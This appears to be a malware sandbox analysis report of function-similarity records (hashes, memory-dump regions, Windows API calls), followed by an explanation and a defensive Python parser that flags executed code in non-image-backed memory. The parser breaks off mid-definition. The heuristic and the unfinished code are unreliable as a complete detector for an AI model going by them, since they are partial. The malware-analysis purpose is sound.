                                                                            • Instruction ID: c0c5a0ab117dee455d4c6c739bf3b759c2c5b5b91ffda64a2effc37a7cd40bad
                                                                            • Opcode Fuzzy Hash: f9154f6813b35f5e849061fcfaf88a5200d9197f54dc6ddbdd48086d4df7a377
                                                                            • Instruction Fuzzy Hash: 3E11E6B6404280CFCF12CF10D9C4B16BF71FB94324F24C6AAD8450B656C33AD95ACBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.319106918.0000000007330000.00000040.00000001.sdmp, Offset: 07330000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7314df80411e7fb59e8fc2a638bf9369ce981a9fe85117d08fbfcf39c5594955
                                                                            • Instruction ID: 74579c3592e92b3834a48017be2e49a9268db10d92db5443c94e4679747b64b6
                                                                            • Opcode Fuzzy Hash: 7314df80411e7fb59e8fc2a638bf9369ce981a9fe85117d08fbfcf39c5594955
                                                                            • Instruction Fuzzy Hash: DB21D6B4A00218CFDB54DF68D485AAAF7F5EB89214F10C0E6E919A7356CB34ED41CF60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305143611.0000000000E0D000.00000040.00000001.sdmp, Offset: 00E0D000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 646dd4adab6d87037fbba390e1aa4c276690e0fba5f49f4a289d7c9cdc80154c
                                                                            • Instruction ID: 04b492e524bd4069a633b46035ea43588eafb406ce0d92886438c5568929907b
                                                                            • Opcode Fuzzy Hash: 646dd4adab6d87037fbba390e1aa4c276690e0fba5f49f4a289d7c9cdc80154c
                                                                            • Instruction Fuzzy Hash: 1D11E371508680CFCB11CF14D9C4719FBA1FB84724F24C6AAC8485B686C339D84ACB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.319106918.0000000007330000.00000040.00000001.sdmp, Offset: 07330000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6c33ee326c16a7bf59bf28a919398ffa1ecc295a9ccf985a86ba90bcc5750186
                                                                            • Instruction ID: 293060d483996121333b22178e385fcb76330aedca76d3874f72164820e06b5c
                                                                            • Opcode Fuzzy Hash: 6c33ee326c16a7bf59bf28a919398ffa1ecc295a9ccf985a86ba90bcc5750186
                                                                            • Instruction Fuzzy Hash: CF1116B4B44258CFDB20DF68D985A99BBB1EF49311F4081D6E50DEB751C734AE808F52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.319106918.0000000007330000.00000040.00000001.sdmp, Offset: 07330000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a02557c17381098f879364ac97db47429312749029eb09267702522282371df7
                                                                            • Instruction ID: 9d23f210b36b44ab7cecdca9866a753bfbb23cbe0eaf157789bf78ca8347e0e3
                                                                            • Opcode Fuzzy Hash: a02557c17381098f879364ac97db47429312749029eb09267702522282371df7
                                                                            • Instruction Fuzzy Hash: 86D012633105A5378548619EAC0196FF29DCBC7AA2B41013AF718D77C1CD51AC1503E5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.319106918.0000000007330000.00000040.00000001.sdmp, Offset: 07330000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4dcbe4033a72af47d9ed311cb747278391011be0246df7b38907bdade559173c
                                                                            • Instruction ID: 67661f11289e488b196c43d9e4b9035e084ce03d1e7f6fb4b400ab9f3324e5fc
                                                                            • Opcode Fuzzy Hash: 4dcbe4033a72af47d9ed311cb747278391011be0246df7b38907bdade559173c
                                                                            • Instruction Fuzzy Hash: 62D0A9F2D0220CFB9B00EFF0C8018AFB7B8DB01100B0245EA9909AB210FE328F0067C2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.319106918.0000000007330000.00000040.00000001.sdmp, Offset: 07330000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4bf87a8783de032847ca39a236a3e25b0fab7c9aecc566bcafa58cdfaf4bd300
                                                                            • Instruction ID: c8dc973f9470577cd291bc76b630d184bbe0273953f16ee3b51c8d032b4f6afb
                                                                            • Opcode Fuzzy Hash: 4bf87a8783de032847ca39a236a3e25b0fab7c9aecc566bcafa58cdfaf4bd300
                                                                            • Instruction Fuzzy Hash: 79D052B2D0220CEB9B00EFA0880188EB6B8DB01100B0045EA99089B220EA328E006BC2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.319106918.0000000007330000.00000040.00000001.sdmp, Offset: 07330000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 62e99fec7fc7b3badb76ed6fac95d876cbcbbc8c6ba798f6f8a58cf9ec5f1353
                                                                            • Instruction ID: bb7f7630ff1dfa8b2cb30510f8fa5f927e770b151beab50ab267367b779875dd
                                                                            • Opcode Fuzzy Hash: 62e99fec7fc7b3badb76ed6fac95d876cbcbbc8c6ba798f6f8a58cf9ec5f1353
                                                                            • Instruction Fuzzy Hash: 65D0C9F2D0622CFB9B00EFF4D90289FB7B9DB05500B1146EA99099B210FE365F1067D2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.319106918.0000000007330000.00000040.00000001.sdmp, Offset: 07330000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dbcef5c395f5c673d87ed76c55c2f1c93d814102d17bdb09fc090918b690f88a
                                                                            • Instruction ID: 58c7e918dc9fc6e739d0296992eb27fcb8a7bf4254ad48f247067e0340e6a738
                                                                            • Opcode Fuzzy Hash: dbcef5c395f5c673d87ed76c55c2f1c93d814102d17bdb09fc090918b690f88a
                                                                            • Instruction Fuzzy Hash: A6C012313402095BD304CA88C842A22B3AADBC8614B14C079A808C7746DE36EC028694
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.319106918.0000000007330000.00000040.00000001.sdmp, Offset: 07330000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                            • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                                                            • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                            • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.304839621.00000000006A2000.00000002.00020000.sdmp, Offset: 006A0000, based on PE: true
                                                                            • Associated: 00000000.00000002.304825102.00000000006A0000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.304885986.000000000072E000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 808fd7effe782b89d215cf12035b8f47c24dc8114fe9693304e57852be07821d
                                                                            • Instruction ID: 250ccae9164393af053a923e1686ea099967037ad1e8485f08fef25c5a590454
                                                                            • Opcode Fuzzy Hash: 808fd7effe782b89d215cf12035b8f47c24dc8114fe9693304e57852be07821d
                                                                            • Instruction Fuzzy Hash: 7D52F25154F7C25FC7139B785CB52D2BFB2AE6322871E49CBC4C08F4A3D109599AEB22
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fd9f548338e432473028d5556b6549aff99dc0b7989402ebf47de8bf2d4821e8
                                                                            • Instruction ID: 2c3b15f3c344742d7afc3f69871ad8d56dedc7022d21eb9a1252669dc57fe53c
                                                                            • Opcode Fuzzy Hash: fd9f548338e432473028d5556b6549aff99dc0b7989402ebf47de8bf2d4821e8
                                                                            • Instruction Fuzzy Hash: 481206F1C99746CBDB10CF65E9982A93BA0B74432CFD24A08D2612FAD1D7B8156ECF44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1837992a558c7a6c2abe9ad5be049bd79d6927a85215a2b96df973c1c7a13a5d
                                                                            • Instruction ID: 959a6f1953ae4f97396e8ef4726bde91587c1cf0835c79937a806b6062da3391
                                                                            • Opcode Fuzzy Hash: 1837992a558c7a6c2abe9ad5be049bd79d6927a85215a2b96df973c1c7a13a5d
                                                                            • Instruction Fuzzy Hash: 78A19E36E0060ACFCF15DFA5C8445DEB7F2FF85305B25896AE905BB261DB31A919CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 04391ea995c73dcdda1842c26861eef103f60e573b8f3d14d5655b00c8d4a444
                                                                            • Instruction ID: cb49f1cabdb23e98cf08b3cf23b0283e7a93510fdee6238c926456a6d0a441b2
                                                                            • Opcode Fuzzy Hash: 04391ea995c73dcdda1842c26861eef103f60e573b8f3d14d5655b00c8d4a444
                                                                            • Instruction Fuzzy Hash: 96C129F1C99746CBDB10CF65E8982A97B71BB8432CFD24A08D2616F6D0D7B8146ACF44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Executed Functions

                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.489974657.0000000006CC0000.00000040.00000001.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d483a8208a7e5265de542f2ef48e696df9a16b1d51598a02c5fe6430e1c05d00
                                                                            • Instruction ID: 8bbe8e62aefe20a744d9c20fa6532ac6b976e2033a3981bf02c7443b221f6d88
                                                                            • Opcode Fuzzy Hash: d483a8208a7e5265de542f2ef48e696df9a16b1d51598a02c5fe6430e1c05d00
                                                                            • Instruction Fuzzy Hash: 73413871D05219DFCB40CFA9D980ADEFBF9AF88310F15816AE918E7241E7359A05CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 029BB730
                                                                            • GetCurrentThread.KERNEL32 ref: 029BB76D
                                                                            • GetCurrentProcess.KERNEL32 ref: 029BB7AA
                                                                            • GetCurrentThreadId.KERNEL32 ref: 029BB803
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.480239496.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: 28b57da8509fe6a14e47bc21ceffd72f7330e34aa94b6cfa91183847ed0beb7b
                                                                            • Instruction ID: f00e5c7357a1d9ede9f0cb1fd228cfe1b154d1a1e2c03c608d1a0fcfdc5b003e
                                                                            • Opcode Fuzzy Hash: 28b57da8509fe6a14e47bc21ceffd72f7330e34aa94b6cfa91183847ed0beb7b
                                                                            • Instruction Fuzzy Hash: 075187B0E053498FDB10CFAAC688BDEBBF1AF48318F208459E419A7790D7349845CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 029BB730
                                                                            • GetCurrentThread.KERNEL32 ref: 029BB76D
                                                                            • GetCurrentProcess.KERNEL32 ref: 029BB7AA
                                                                            • GetCurrentThreadId.KERNEL32 ref: 029BB803
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.480239496.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: 2beccc28452c23e703cc8cf58d09bdd3fc90a8c7d28eea52b9858fea43120078
                                                                            • Instruction ID: b19272208759cbcce8ee661c54240a70d8262f632af302b88aa92e4dde201335
                                                                            • Opcode Fuzzy Hash: 2beccc28452c23e703cc8cf58d09bdd3fc90a8c7d28eea52b9858fea43120078
                                                                            • Instruction Fuzzy Hash: 315156B0E017498FDB10CFAAC688BEEBBF1AF48318F208459E419A7790D7749845CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 029B962E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.480239496.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID: HR$HR
                                                                            • API String ID: 4139908857-4037001784
                                                                            • Opcode ID: 7f69e67774c485b8423c78298bc98e69fe9f4878e75db02c8e220784beec290d
                                                                            • Instruction ID: 3266c308585cc98f0f017279747364e6b6eb5212fd40ded23a5412f001795072
                                                                            • Opcode Fuzzy Hash: 7f69e67774c485b8423c78298bc98e69fe9f4878e75db02c8e220784beec290d
                                                                            • Instruction Fuzzy Hash: 46713570A10B058FD725DF2AC14179ABBF6BF88308F008A2DD58AD7A50D774E845CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 029BFD0A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.480239496.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 71d994c5c56c154abf1368748a1cde5668ef3aa36ccba23da2fe1ac5e66786b1
                                                                            • Instruction ID: aafc21305910c042e54164631932b3724d4c6c90e6cb8deb6e818b3df141851d
                                                                            • Opcode Fuzzy Hash: 71d994c5c56c154abf1368748a1cde5668ef3aa36ccba23da2fe1ac5e66786b1
                                                                            • Instruction Fuzzy Hash: 60917F71C093889FCB02CFA5C991ADDBFB1FF4A314F19819AE844AB262C3749845CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetSystemTimes.KERNEL32(00000006,00000006,?), ref: 06CC06C4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.489974657.0000000006CC0000.00000040.00000001.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: SystemTimes
                                                                            • String ID:
                                                                            • API String ID: 375623090-0
                                                                            • Opcode ID: a5f0584b1850e3cabaf5fe36afe8df54fe1fbe2e20cd070ca2cc2518c7a377ed
                                                                            • Instruction ID: c5764096ca11f6db574cefa97eacb0941757584fd7d9b074cf59fb59721192ca
                                                                            • Opcode Fuzzy Hash: a5f0584b1850e3cabaf5fe36afe8df54fe1fbe2e20cd070ca2cc2518c7a377ed
                                                                            • Instruction Fuzzy Hash: 03B1BF75D0061ACFDB51DF69C880AC9FBB5BF48310F15C69AD958AB301E770AA85CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegQueryValueExA.KERNEL32(00000000,05095F31,00020119,00000000,00000000,?), ref: 050962FF
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.487462241.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID:
                                                                            • API String ID: 3660427363-0
                                                                            • Opcode ID: 8fca35b745907afb1c75e9d56ab2848a57412bacb108cc79e4fb0186125c33a1
                                                                            • Instruction ID: e682f0518529133fba47611e20e322e1caa9e8e9d8012aecd0d4c38226f42e9d
                                                                            • Opcode Fuzzy Hash: 8fca35b745907afb1c75e9d56ab2848a57412bacb108cc79e4fb0186125c33a1
                                                                            • Instruction Fuzzy Hash: E9715770E046089FDF18CFA9D884BEEBBF1BF48314F148029E815AB395DB769845DB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegQueryValueExA.KERNEL32(00000000,05095F31,00020119,00000000,00000000,?), ref: 050962FF
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.487462241.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID:
                                                                            • API String ID: 3660427363-0
                                                                            • Opcode ID: 37babc06ddff24c162a996808dbe670e2cf0fce164c650b781c10ea7b4852442
                                                                            • Instruction ID: 2349d3cffab43ac42433cd4d9c0968d5a178c21c2d947eea627dcf6dd515bf80
                                                                            • Opcode Fuzzy Hash: 37babc06ddff24c162a996808dbe670e2cf0fce164c650b781c10ea7b4852442
                                                                            • Instruction Fuzzy Hash: 8D715770D046089FDF18CFA9D884BEEBBF1BF48314F148029E815A7394DB759885DB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 029BFD0A
                                                                            Memory Dump Source

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.477574623.0000000000CED000.00000040.00000001.sdmp, Offset: 00CED000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3113e65d3a1fd7ea622a6671409d3473f2eeff48952b3e5bae18d1befbfb720c
                                                                            • Instruction ID: 9b48069e293ed3186b95c4cd455787e2d0a1b753948216bdc2e787be5973a674
                                                                            • Opcode Fuzzy Hash: 3113e65d3a1fd7ea622a6671409d3473f2eeff48952b3e5bae18d1befbfb720c
                                                                            • Instruction Fuzzy Hash: 5811D3B6404280CFCF12CF54D5C4B16BF71FB94324F24C6A9D8060B256C336D95ACBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.490262721.0000000007050000.00000040.00000001.sdmp, Offset: 07050000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ea66262643841aa5c603944ef770b918a11f85631256eaed675daa2d70871a76
                                                                            • Instruction ID: d0c9dbf651338254dc8f82106306ef228287ac0675b621bea4847be64950429d
                                                                            • Opcode Fuzzy Hash: ea66262643841aa5c603944ef770b918a11f85631256eaed675daa2d70871a76
                                                                            • Instruction Fuzzy Hash: 0B012B603081E51FD355A63D481473FA9DB9BC9744F19C46EEA0BCB386CD748C0253A6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.490262721.0000000007050000.00000040.00000001.sdmp, Offset: 07050000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 69b073c2c5e2d8c90b8a967f244bbd9155acb3a03d279d79cf607025003e6731
                                                                            • Instruction ID: dae60ae22fc35b4b841a7d6fb2a8f6a646fb37bfeca17a09915ac942594003f2
                                                                            • Opcode Fuzzy Hash: 69b073c2c5e2d8c90b8a967f244bbd9155acb3a03d279d79cf607025003e6731
                                                                            • Instruction Fuzzy Hash: 1AF090B1A182199FD780EF7898156DFBBF0FB85210F204A6AD553DA240DB794A03CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.490262721.0000000007050000.00000040.00000001.sdmp, Offset: 07050000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 416872583bdde2c05faac7c2c89f77b2ce58f4e1280880755b40b4cb088281f9
                                                                            • Instruction ID: 05eb9b50c45c91ac6b93ca67c78ba2eb21cf51bcb1105ff03d6de812199cc245
                                                                            • Opcode Fuzzy Hash: 416872583bdde2c05faac7c2c89f77b2ce58f4e1280880755b40b4cb088281f9
                                                                            • Instruction Fuzzy Hash: AAE0227131C740DFC3046B347C649AF3B23ABC6700F04C626F6079A286CAB2084383A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.490262721.0000000007050000.00000040.00000001.sdmp, Offset: 07050000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 38509bb9d1722f4f742c61bd7d721a43371cf4945786750dcd3261bcfb95e6d8
                                                                            • Instruction ID: dc79a13286487201e6771341ef4e923067d637265dfbb8cde921d74aa65d79ae
                                                                            • Opcode Fuzzy Hash: 38509bb9d1722f4f742c61bd7d721a43371cf4945786750dcd3261bcfb95e6d8
                                                                            • Instruction Fuzzy Hash: 70E0B6B0D002099EC780EFA9851179EBBF0AB04204F2089698415EA241E77546058B91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.490262721.0000000007050000.00000040.00000001.sdmp, Offset: 07050000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c5bd29a79daca79a9d1353a6f900d67048c3a05dc7079e77160c5e7fa0243140
                                                                            • Instruction ID: 14314468f84d39dae736827842d8006cbd2cad182703f5832fa8f74873c0a768
                                                                            • Opcode Fuzzy Hash: c5bd29a79daca79a9d1353a6f900d67048c3a05dc7079e77160c5e7fa0243140
                                                                            • Instruction Fuzzy Hash: 12C08C70228204D7CA289B2A7DA09AF375B53CA704F40C224B81A62184CEB278410640
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.489974657.0000000006CC0000.00000040.00000001.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 60e9e7117db3b259d9e82d12e1ccf35808c498e327ee556bd787902f040631ec
                                                                            • Instruction ID: ee621ce5b7aa9b29c7234e54dc1e3e98069a13125858e9bf6d1c769b7a490c6e
                                                                            • Opcode Fuzzy Hash: 60e9e7117db3b259d9e82d12e1ccf35808c498e327ee556bd787902f040631ec
                                                                            • Instruction Fuzzy Hash: 23018F31E01218DFCB48AFA5E4186EDBBB5EB4E322F10642DD105B3240DB714945CB68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.489974657.0000000006CC0000.00000040.00000001.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d3c301eb8cd72d3566420a0531ad39584274f4fd4018f32ec1c4ff2a19953341
                                                                            • Instruction ID: 2125ad64e7cab9dff9ee88f98b65401572a42b5d5178fea9bd6cf1728ffc97c3
                                                                            • Opcode Fuzzy Hash: d3c301eb8cd72d3566420a0531ad39584274f4fd4018f32ec1c4ff2a19953341
                                                                            • Instruction Fuzzy Hash: C8F08130E012188FCB08AFAAD4587EDBBB5EB8E312F04542DD105B3280DB755944CB68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Executed Functions

                                                                            APIs
                                                                            • SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 02F21A4B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.326383828.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                                                            Similarity
                                                                            • API ID: PathSearch
                                                                            • String ID: 4Q4$4Q4
                                                                            • API String ID: 2203818243-3579632344
                                                                            • Opcode ID: fd68d255fd70ded137b72d47e82d791f6a019306735e751326560c71e072ca66
                                                                            • Instruction ID: 0246842ef363254e16458ad79aed41282dcbd369d84b025fd487d75db6f03694
                                                                            • Opcode Fuzzy Hash: fd68d255fd70ded137b72d47e82d791f6a019306735e751326560c71e072ca66
                                                                            • Instruction Fuzzy Hash: C9713371D002188FDB24CF99C994A9EBBF1BF49314F24812EE819AB351DB34A949CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 02F21A4B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.326383828.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                                                            Similarity
                                                                            • API ID: PathSearch
                                                                            • String ID: 4Q4$4Q4
                                                                            • API String ID: 2203818243-3579632344
                                                                            • Opcode ID: 7f4584c67885711b68fbe3118103880698e0ac5c35936a2b1c20f63a8ba09e32
                                                                            • Instruction ID: 79b29c65f0d6893d68917621fa167686aac0fb8d7838b516447a46db654e7004
                                                                            • Opcode Fuzzy Hash: 7f4584c67885711b68fbe3118103880698e0ac5c35936a2b1c20f63a8ba09e32
                                                                            • Instruction Fuzzy Hash: 9F714471D002188FDB24CF99C8907DEBBF1BF49314F24812AE919AB351DB34A949CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

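Each entry above describes one function recovered from a process memory dump: the dump file name encodes the process and region, "based on PE" says whether that region is image-backed, "Executed Functions" versus "Non-executed Functions" says whether the sandbox actually saw it run, and the API, opcode and fuzzy-hash fields are the fingerprints used for the similarity lookup. The two entries just above are the ones worth a second look: an executed function in process 00000011 calls SearchPathW from region 02F20000 (the call site 02F21A4B lies inside it), and that region is not PE-backed, which is the footprint of injected or manually mapped code rather than a loaded module. The parser below is an added example, not part of the report or of Joe Sandbox, that turns these entries into structured records and applies exactly that check. It assumes the dotted .sdmp name is laid out as process ID, index, serial, base address, page protection and type, all in hex, so that the 00000040 field is the Win32 PAGE_EXECUTE_READWRITE value; that layout is an assumption read off the values on this page, not documented here. The embedded input is a constructed excerpt mirroring three entries from this section, with most fingerprint fields dropped for brevity and the last entry left truncated, as the last entry on this page is.

```python
"""Parse Joe Sandbox-style function-similarity records. Added example, not the
report's or Joe Sandbox's code; the .sdmp name layout below is an assumption."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

PAGE_EXECUTE_READWRITE = 0x40  # Win32 page-protection constant

# Constructed excerpt mirroring three entries on this page (fields shortened).
SAMPLE = """\
Executed Functions
APIs
• SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 02F21A4B
Strings
Memory Dump Source
• Source File: 00000011.00000002.326383828.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
Similarity
• API ID: PathSearch
• String ID: 4Q4$4Q4
• Opcode ID: fd68d255fd70ded137b72d47e82d791f6a019306735e751326560c71e072ca66
Uniqueness
Uniqueness Score: -1.00%
Non-executed Functions
Memory Dump Source
• Source File: 0000000A.00000002.489974657.0000000006CC0000.00000040.00000001.sdmp, Offset: 06CC0000, based on PE: false
Similarity
• API ID:
• Opcode ID: 60e9e7117db3b259d9e82d12e1ccf35808c498e327ee556bd787902f040631ec
Uniqueness
Uniqueness Score: -1.00%
Executed Functions
Memory Dump Source
• Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
Similarity
• Opcode ID: 5415ab5483d4423aa206bc1f15e18d20d135b800e12282fb1695dc7cd7a58017
"""

# Assumed .sdmp name: <pid hex>.<index>.<serial>.<base>.<page protection>.<type>
SRC_RE = re.compile(r"^•\s*Source File:\s*(\S+)\.sdmp,\s*Offset:\s*([0-9A-Fa-f]+),"
                    r"\s*based on PE:\s*(true|false)$")
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(-?[0-9.]+)%$")


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int  # call-site address


@dataclass
class FunctionRecord:
    executed: bool
    pid: int         # assumed: first dotted field of the .sdmp name
    base: int        # region base, from the Offset field
    protection: int  # assumed: fifth dotted field, a Win32 page protection
    pe_backed: bool
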